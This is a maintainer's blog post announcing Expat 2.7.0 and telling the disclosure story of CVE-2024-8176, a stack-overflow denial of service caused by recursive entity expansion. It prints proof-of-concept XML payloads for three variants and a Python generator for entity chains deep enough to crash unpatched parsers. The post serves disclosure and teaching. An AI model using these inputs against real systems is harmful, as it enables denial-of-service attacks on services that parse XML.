Recursion kills: The story behind CVE-2024-8176 / Expat 2.7.0 released, includes security fixes
For readers new to Expat:
libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.
Expat 2.7.0 was released earlier today. I will make this a more detailed post than usual because in many ways there is more to tell about this release than the average libexpat release: there is a story this time.
What is in release 2.7.0?
The key motivation for cutting a release now is to get the fix for a long-standing vulnerability out to users. I will get to that vulnerability, CVE-2024-8176, in detail in a moment. First, what else is in this release?
There are also fixes to the two official build systems as usual, as well as improvements to the documentation.
There is a new fuzzer xml_lpm_fuzzer by Mark Brand that OSS-Fuzz has already started to include in their daily continuous fuzzing; the fuzzer is based on Clang's libFuzzer and Google's libprotobuf-mutator (LPM), which applies a variant of coverage-guided fuzzing called structured fuzzing.
A side job of integrating that new fuzzer was making its dependency libprotobuf-mutator support the versions of Protobuf that are shipped by Ubuntu 24.04, 22.04 and 20.04: my related work upstream is available to everyone.
Another interesting sideshow of this release is the (harmless) TOCTTOU issue that was uncovered by static analysis in a benchmarking helper tool shipped next to core libexpat. If you have not heard of that class of race condition vulnerability but are curious, the related pull request could be of interest: it is textbook TOCTTOU in a real-world example.
One other thing that is new in this release is that Windows binaries are now built by GitHub Actions rather than AppVeyor, and not just 32-bit but also 64-bit. I already added 64-bit binaries post-release to the previous release Expat 2.6.4 on January 21st, but only now is it becoming a regular part of the release process.
The vulnerability report
So what is that long-standing vulnerability about? In July 2022 — roughly two and a half years ago — Jann Horn of Google Project Zero and Spectre/Meltdown fame reached out to me via e-mail with a finding in libexpat, including an idea for a fix.
What he found can be thought of as "the linear version of billion laughs" — a linear chain (of so-called general entities) rather than a tree — like this:
<!DOCTYPE doc [
  <!ENTITY g0 ''>
  <!ENTITY g1 '&g0;'>
  <!ENTITY g2 '&g1;'>
]>
<doc>&g2;</doc>
Except not with two (or three) levels, but thousands. Why would a chain of thousands of entity references be a problem to libexpat? Because of recursion, because of recursive C function calls: each call to a function increases the stack, and if functions are calling each other recursively, and attacker-controlled input can influence the number of recursive calls, then with the right input, attackers can force the stack to overflow into the heap: stack overflow, segmentation fault, denial of service. It depends on the stack size of the target machine how many levels of nesting it takes for this to hit: 23,000 levels of nesting would be enough to hit on one machine, but not another.
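To get a feeling for how little effort such an input takes, here is a minimal Python sketch that generates the chain for an arbitrary depth. The function name `build_entity_chain` is made up for this illustration and is not part of Expat or any tool mentioned in this post. It only builds the document as a string; please do not feed deep chains to an unpatched parser on a machine you care about, since the process may crash.

```python
def build_entity_chain(depth: int) -> str:
    """Return an XML document with a linear chain of general entities.

    g0 is empty, and every g<i> consists of nothing but a reference
    to g<i-1>; the document body references the last entity in the chain.
    (Hypothetical helper for illustration only.)
    """
    if depth < 0:
        raise ValueError("depth must not be negative")
    declarations = ["<!ENTITY g0 ''>"]
    declarations += [
        f"<!ENTITY g{i} '&g{i - 1};'>" for i in range(1, depth + 1)
    ]
    return (
        f"<!DOCTYPE doc [ {' '.join(declarations)} ]> "
        f"<doc>&g{depth};</doc>"
    )


if __name__ == "__main__":
    # Depth 2 reproduces the small example from the text.
    print(build_entity_chain(2))
    # A chain with thousands of levels is still just a modest text file.
    print(len(build_entity_chain(23_000)), "characters")
```

Note that the size of the document grows only linearly with the depth, which is what sets this apart from the exponential growth of classic billion laughs.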
The education that introduces or leads people towards recursion should come with a warning: recursion is not just beautiful, a thinking tool, and a route to often simpler solutions; it also has a dark side, a big inherent security problem. The article The Power of 10: Rules for Developing Safety-Critical Code warned about the use of recursion in 2006, but Expat development had already started in 1997.
Already in that initial e-mail, Jann shared what he considered the fix — avoiding (or resolving) recursion — and there was a proof-of-concept patch attached of how that could be done in general. Unlike other Project Zero findings, there would be no 90-days-deadline for this issue, because — while stack clashing was considered and is a theoretical possibility — denial of service was considered to be the realistic impact. It should be noted that this risk assessment comes without any guarantees.
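The general idea of resolving recursion can be sketched in a few lines of Python. To be clear, this is neither Jann's patch nor the code that ended up in Expat; it is a toy entity expander, with all names (`expand_recursive`, `expand_iterative`, `build_chain`, `hits_recursion_limit`) invented for this illustration. Python's recursion limit plays the role of the finite C stack here, with the difference that Python raises a RecursionError where C would crash. The sketch also assumes that entities do not reference themselves, which well-formed XML forbids anyway, and it uses a non-empty innermost entity so that there is something to see.

```python
import re
import sys

ENTITY_REF = re.compile(r"&(\w+);")


def expand_recursive(name, entities):
    """Expand an entity with one function call per level of nesting."""
    value = entities[name]
    out, pos = [], 0
    for match in ENTITY_REF.finditer(value):
        out.append(value[pos:match.start()])
        out.append(expand_recursive(match.group(1), entities))  # recursion
        pos = match.end()
    out.append(value[pos:])
    return "".join(out)


def expand_iterative(name, entities):
    """Expand an entity using an explicit stack on the heap instead."""
    out = []
    stack = [("ref", name)]  # pending work: ("ref", name) or ("text", str)
    while stack:
        kind, payload = stack.pop()
        if kind == "text":
            out.append(payload)
            continue
        value = entities[payload]
        pieces, pos = [], 0
        for match in ENTITY_REF.finditer(value):
            if match.start() > pos:
                pieces.append(("text", value[pos:match.start()]))
            pieces.append(("ref", match.group(1)))
            pos = match.end()
        if pos < len(value):
            pieces.append(("text", value[pos:]))
        # Push in reverse so that the leftmost piece is handled first.
        stack.extend(reversed(pieces))
    return "".join(out)


def build_chain(depth, innermost="x"):
    """Return a dict modelling the chain g0 <- g1 <- ... <- g<depth>."""
    entities = {"g0": innermost}
    for i in range(1, depth + 1):
        entities[f"g{i}"] = f"&g{i - 1};"
    return entities


def hits_recursion_limit(depth):
    """Report whether the recursive expander gives up at this depth."""
    try:
        expand_recursive(f"g{depth}", build_chain(depth))
    except RecursionError:
        return True
    return False


if __name__ == "__main__":
    deep = sys.getrecursionlimit() + 100
    print(hits_recursion_limit(deep))
    print(expand_iterative(f"g{deep}", build_chain(deep)))
```

The iterative version does the same work, but its bookkeeping lives in a list that can grow as far as memory allows, so the depth of the input no longer translates into depth of the call stack.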
The vulnerability process
Two things became apparent to me:
- It seemed likely that this vulnerability had multiple "faces" or variants, and that the only true fix would indeed be to effectively remove all remaining recursion from Expat. It is not the first time that recursion has been an issue in C software, or even libexpat in particular: Samanta Navarro resolved vulnerable recursion in a different place in libexpat code in February 2022 already. Thanks again!
- That it would be a pile of work, not a good match to my unpaid voluntary role in Expat as an addition to my unrelated-to-Expat day job, and not without risk without a partner at detail level on the topic. My prior work on fixing billion laughs for Expat 2.4.0 made me expect this to be similar, but bigger.
And with that expectation, the issue started aging without a fix, and in some sense, I felt paralyzed about the topic and kept procrastinating about it for a long time. Every now and then the topic came up with my friend, journalist and security researcher Hanno Böck, with whom I had shared the issue. He was arguing that even without a fix, the issue should be made public at some point.
One reason why I objected to publication without a fix was that, lacking a cheap clean fix, vendors and distributions would clearly start applying quick hacks that would produce false positives (i.e. rejecting well-formed benign XML misclassified as an attack), leave half of the issue unfixed, and leave the ecosystem with a potentially heterogeneous state of downstream patches where, say, a file would be rejected in openSUSE but parse fine in Debian, or the other way around: a great mess.
I eventually concluded that the vulnerability could not keep sitting in my inbox unfixed for another year, that it needed a fix before publication to not cause a mess, and that I had to take action.
Reaching out to companies for help
In early 2024, I started considering more ways of finding help, and added a call-for-help banner to the change log that was included with Expat 2.6.2. I started drafting an e-mail that I would send out to companies known to use libexpat in hardware. I had started maintaining a (by no means complete) public list of companies using Expat in hardware that now came in handy.
On April 14th, 2024 I started looking for security contacts for companies on that list. For some, it was easy to find and for others, I gave up eventually; for some, I am still not sure whether I got the right address or whether they are ghosting me as part of an ostrich policy. I wish more companies would start serving /.well-known/security.txt; finding vulnerability report contacts is still actual work in 2025 and should not be.
So then I mailed circa 40 companies using a template like this:
Hello ${company},

this e-mail is about ${company} product IT security. Are you the right contact for that? If not please forward it to the responsible contact within ${company} - thank you!

On the security matter:

It has come to my attention that ${company} products and business rely on libexpat or the "Expat" XML parser library, e.g. product ${product} is using libexpat according to document [1].

I am contacting you as the maintainer of libexpat and its most active contributor for the last 8 years, as can be seen at [2]; I am reaching out to you today to raise awareness that:

- All but the latest release of libexpat (2.6.2) have security issues known to the public, so every product using older versions of libexpat can be attacked through vulnerable versions of libexpat.
- Both automated fuzzing [3] and reports from security researchers keep uncovering vulnerabilities in libexpat, so it needs a process of updating the copy of libexpat that you bundle and ship with your products, if not already present.
- My time on libexpat is unfunded and limited, and there is no one but me to constantly work on libexpat security and to also progress on bigger lower priority tasks in libexpat.
- There is a non-public complex-to-fix security issue in libexpat that I have not been able to fix alone in my spare time for months now, that some attackers may have managed to find themselves and be actively exploiting today.

I need partners in fixing that vulnerability.

Can ${company} be a partner in fixing that vulnerability, so that your products using libexpat will be secure to use in the future?

I am looking forward to your reply, best

Sebastian Pipping
Maintainer of libexpat

[1] ${product_open_source_copyright_pdf_url}
[2] https://github.com/libexpat/libexpat/graphs/contributors
[3] https://en.wikipedia.org/wiki/Fuzzing
Replies are coming in
The responses I got from companies were all over the map:
- My "favorite" reply was "We cannot understand what you want from us" when everyone else had understood me just fine. Nice!
- Though that competes with the reply "A patch will be released after the fall." when they had not received any details from me. Okay!
- There was arguing that the example product that I had mentioned was no longer receiving updates (rather than addressing their affected other products that are not end-of-life and continue to use libexpat).
- I was asked to prove a concrete attack on the company's products (which would not scale, need access to the actual product, etc).
- That they "do not have sufficient resources to assist you on this matter even if libexpat is employed in some of .....'s products" came back a few times.
It was interesting and fun in some sense, and not fun in another.
Next stop: confidentiality
What came next was that I asked companies to sign a simple freeform NDA with me. Companies were not prepared for that. Why was I asking for an NDA and TLP:RED? To (1) make sure that whoever got the details would need to collaborate on a true fix and not just monkey-patch their own setups and (2) avoid the scenario of heterogeneous downstream patches that I mentioned before, which would have been likely in case of a leak before there was a true fix.
Some discussions failed at NDA stage already, while others survived and continued to video calls with me explaining Jann's findings in detail.
It is worth noting that I knew going in that many vulnerability reward programs exclude the whole class of denial of service, and so I tied sharing the expected impact to signing an NDA to reduce the chances of everyone discarding it with "Oh 'just' denial of service, we'll pass".
The eventual team and security work
Simplifying a bit, I found two main partner companies in this: Siemens and a company that would not like to be named, let's call them "Unnamed Company". Siemens started development towards a candidate fix, and Unnamed Company started evaluating options of what other companies they could pay to help on their behalf, which got Linutronix and also Red Hat involved.
Siemens took the builder role while Linutronix, Red Hat and I provided quality assurance of various kinds. While we did not work day and night, it is fair to say that we have been working on the issue since May 2024 — for about 10 months.
The three faces of the vulnerability
It did indeed turn out that the vulnerability has multiple — three — faces:
1. General entities in character data
<!DOCTYPE doc [
  <!ENTITY g0 ''>
  <!ENTITY g1 '&g0;'>
  <!ENTITY g2 '&g1;'>
]>
<doc>&g2;</doc>
2. General entities in attribute values
<!DOCTYPE doc [
  <!ENTITY g0 ''>
  <!ENTITY g1 '&g0;'>
  <!ENTITY g2 '&g1;'>
]>
<doc key='&g2;'/>
3. Parameter entities
<!DOCTYPE doc [
  <!ENTITY % p0 ''>
  <!ENTITY % p1 '%p0;'>
  <!ENTITY % p2 '%p1;'>
  <!ENTITY % define_g0 "<!ENTITY g0 '%p2;'>">
  %define_g0;
]>
<doc/>
The third variant "Parameter entities" reuses ideas from my 2013 exploit for vulnerability Parameter Laughs (CVE-2021-3541): It used the same mechanism of delayed interpretation.
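For the curious, the first two variants can be observed at harmless depth through Python's standard library module xml.parsers.expat, which wraps libexpat. The following is a minimal sketch under a few assumptions: the helper names (`chain_declarations`, `in_character_data`, `in_attribute_value`, `parse`) are invented for this illustration, the innermost entity is set to 'x' rather than left empty so that the expansion is visible, and the depth is kept tiny on purpose. The parameter entity variant is left out to keep the sketch small.

```python
import xml.parsers.expat


def chain_declarations(depth, innermost="x"):
    """Return declarations for the chain g0 <- g1 <- ... <- g<depth>."""
    declarations = [f"<!ENTITY g0 '{innermost}'>"]
    declarations += [
        f"<!ENTITY g{i} '&g{i - 1};'>" for i in range(1, depth + 1)
    ]
    return " ".join(declarations)


def in_character_data(depth):
    """Variant 1: the chain is referenced from character data."""
    return (
        f"<!DOCTYPE doc [ {chain_declarations(depth)} ]> "
        f"<doc>&g{depth};</doc>"
    )


def in_attribute_value(depth):
    """Variant 2: the chain is referenced from an attribute value."""
    return (
        f"<!DOCTYPE doc [ {chain_declarations(depth)} ]> "
        f"<doc key='&g{depth};'/>"
    )


def parse(document):
    """Parse with libexpat and return (character data, attributes)."""
    text, attributes = [], {}
    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = text.append
    parser.StartElementHandler = lambda name, attrs: attributes.update(attrs)
    parser.Parse(document, True)  # True marks the final chunk of input
    return "".join(text), attributes


if __name__ == "__main__":
    print(parse(in_character_data(3)))   # chain resolved in element content
    print(parse(in_attribute_value(3)))  # chain resolved in the attribute
```

The same chain of declarations arrives at the application through two different handlers, which hints at why fixing only one place would not have been enough.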
Conclusions and gratitude
It is no overstatement to say that without Berkay Eren Ürün — the main author of the fix — and his manager Dr. Thomas Pröll at Siemens there would be no fix today: a big and personal "thank you!" from me.
Thanks to Unnamed Company, to Linutronix, to Red Hat for your help making this plane fly!
Thanks to Jann Horn for his whitehat research and the demo patch that led the way to a fix!
Thanks to everyone who contributed to this release of Expat!
And please tell your friends:
Please leave recursion to math and keep it out of (in particular C) software: it kills and will kill again.
Kind regards from libexpat, see CVE-2022-25313 and CVE-2024-8176 for proof.
For more details about this release, please check out the change log.
If you maintain Expat packaging or a bundled copy of Expat or a pinned version of Expat somewhere, please update to 2.7.0. Thank you!
Sebastian Pipping